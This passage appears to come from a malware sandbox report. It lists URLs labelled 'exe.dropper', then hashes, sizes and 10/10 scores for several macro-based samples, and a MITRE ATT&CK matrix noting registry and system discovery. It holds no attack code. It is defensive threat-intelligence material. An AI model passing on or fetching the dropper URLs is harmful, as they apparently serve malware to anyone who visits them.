http://schaidl.de/bilder/kc1rs474657/
exe.dropper
http://sauerbeck.net/cgi-bin/MWROisGUDpB/
exe.dropper
http://schaefer-frank.de/cgi-bin/cbj5rnqm65zm8312/
Copy all
TARGETS
* * Target
E1-20200901_051300
* Size
167KB
* MD5
addf8b33335d70314cf18f5582ee4a12
* SHA1
f2e64096c370fabe69931cee4dbd1532ebd193b5
* SHA256
c6863b77bc935102ab822a006f8ead9cf9b8f827206dbfd8d08d41a64c8e4f55
* SHA512
9f195ed46c917e0c1c54b18ee87fa8e8441fd6bfdaf891e107096f3c4f2fbb4523e9cbac76db95b70fbcb43608c3edee9db2a66ccfbbc068da6e73080bd7e8c8
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral1
* * Target
E1-20200901_102700
* Size
167KB
* MD5
4d047a38df59016281af0135f87a5f2d
* SHA1
fbb3d1bf056d52dcebebd5a4bd253504409e9620
* SHA256
9a38e43b32da78c76e31d5aeba0db3276a8add0df807025961baa25cd2d33477
* SHA512
76992b45463ffd73483999640d9c22a8ac632d66a1901b3ff8fd5f61a6f70b6a54b1d3791a4912e7c36a6db35d8d929358f5165a39502f9b5c4837015f5f165e
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral2
* * Target
E1-20200901_153500
* Size
169KB
* MD5
c43249e3d749c8908d621d620094864d
* SHA1
bc4274cb631d9d552f8d8ea90c6f7c2586f02900
* SHA256
380ec7963c4ae61fe23694d6d55c5fadd6e0b3edd1703a68eae08a19a45deef4
* SHA512
fb8d241527d7498dced92993c2b4d4ae48bc48bd1d4de29da80727357ca8a0b0b7666ed0f7cb50065748741e9c657663347df68f99246a41fc4c9c9f8009dda5
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral3
* * Target
E1-20200901_180500
* Size
224KB
* MD5
8124fdead1d01f9f105c6faf58e317a8
* SHA1
5ed009dbed585a1469216fd2b370ff869b9f0661
* SHA256
17c3eb375f9bf94a27d63248723dc3f1361b906098c4b854a54e229b6d6f00e1
* SHA512
10ff30d1167872f4505772adb2792248f22c22d0a8a265adbb30ce35ea1a4edfea2e0f18cc5740afdedbfb93771502b2ed2a6df850e92cae121bb414c3740742
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral4
* * Target
E1-20200901_212900
* Size
171KB
* MD5
ddda070b3802f2466bb12a5ecc3889af
* SHA1
9e3f19bbabc7fce4b5f67370327bdce424e62eae
* SHA256
ffd7de3113133a8ab269601664ce5a200cccaa8f3872de1689718f7d4ed7fc1c
* SHA512
5941d16b95de2a5f56bd0eb1d9c4a7beb1583717c527604cf6131cd8c224ff79bec403c0b1f139b57ac063b81b99575f9dfe0562a5dec5f13aa9364532eb3eee
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral5
* * Target
E3-20200901_063500
* Size
180KB
* MD5
5d63d163ed6d1f6ad050b466e80881c7
* SHA1
a908b33375cd2a053ba7b7673071bf558ed8f1b7
* SHA256
0e35f41b8f26b030789a90d798c2e94fbc36f0fff167a78227b05a6fac2efd43
* SHA512
ff69c35a745e8ccb812982414948b1affa1df660076d3e0e6db74ffc6402ae89571a477dd146f614a573fea0bef63219307694cafd38083708ce78cd5e6c1f19
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral6
* * Target
E3-20200901_110400
* Size
172KB
* MD5
22d248bf4c2625a135ea259bf2e9b23b
* SHA1
1b88fd9571b18b3a555e6d4be7a3c13e23840bfa
* SHA256
a2cf8fd11fea05f5f3416294b23e69eb9c7c28f37e0b1acbeb56edbb153b69b7
* SHA512
ba33b5686707b6faf14b4f953090f3d81bb7f9326b65a3c4247cfc2b1a952e45258049bcff7f52c7d5274623eba76e0815fa47137d00368a798c0292355c0508
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral7
* * Target
E3-20200901_160000
* Size
178KB
* MD5
c940ea960966eae417bfbbdbb2ceea52
* SHA1
b74e2c3046d2eb4ff225cbea085574cf0bb9effb
* SHA256
a5f10af1a0817802d95a30c0c3a79cc2fcf9520949afd580cdf7b5ba7f2b6f48
* SHA512
1781a9be5d3611ff480d3a595bf322d6abbad97f360ac4b53bd4bfcc9a44f74db6c359131b2b723c451282332b8d430dfe324b6386e7a6c228559aa897eae179
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral8
* * Target
E3-20200901_210000
* Size
177KB
* MD5
653a30c4613943ce5bd6e929d9993cf3
* SHA1
2be658bee033f11ab3213025a01186c0435c8f2f
* SHA256
e8bc071163937181a3b7d387e48af7d8abdfcfd2b83692bf8132666b773a5480
* SHA512
68aecea4d750bc9909cd077eb858422673717231d4f1be1c51e8ddda790b432231030f593f153c80e61522b2bbc4371405ca9c091e2923744d663a6d5b530bcf
Score
10/10
* PROCESS SPAWNED UNEXPECTED CHILD PROCESS
This typically indicates the parent process was compromised via an exploit
or macro.
behavioral9
MITRE ATT&CK MATRIX ATT&CK V6
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Query Registry
18
T1012
System Information Discovery
18
T1082
Lateral Movement
Collection
Exfiltration
Command and Control
Impact
TASKS
STATIC1
macro
Score
8/10
BEHAVIORAL1
Score
10/10
BEHAVIORAL2
Score
10/10
BEHAVIORAL3
Score
10/10
BEHAVIORAL4
Score
10/10
BEHAVIORAL5
Score
10/10
BEHAVIORAL6
Score
10/10
BEHAVIORAL7
Score
10/10
BEHAVIORAL8
Score
10/10
BEHAVIORAL9
Score
10/10
© 2018-2024
Terms | Privacy
WE CARE ABOUT YOUR PRIVACY.
This website stores cookies on your computer. These cookies are used to improve
your website experience and provide more personalized services to you, both on
this website and through other media. To find out more about the cookies we use,
see our Privacy Policy.
Accept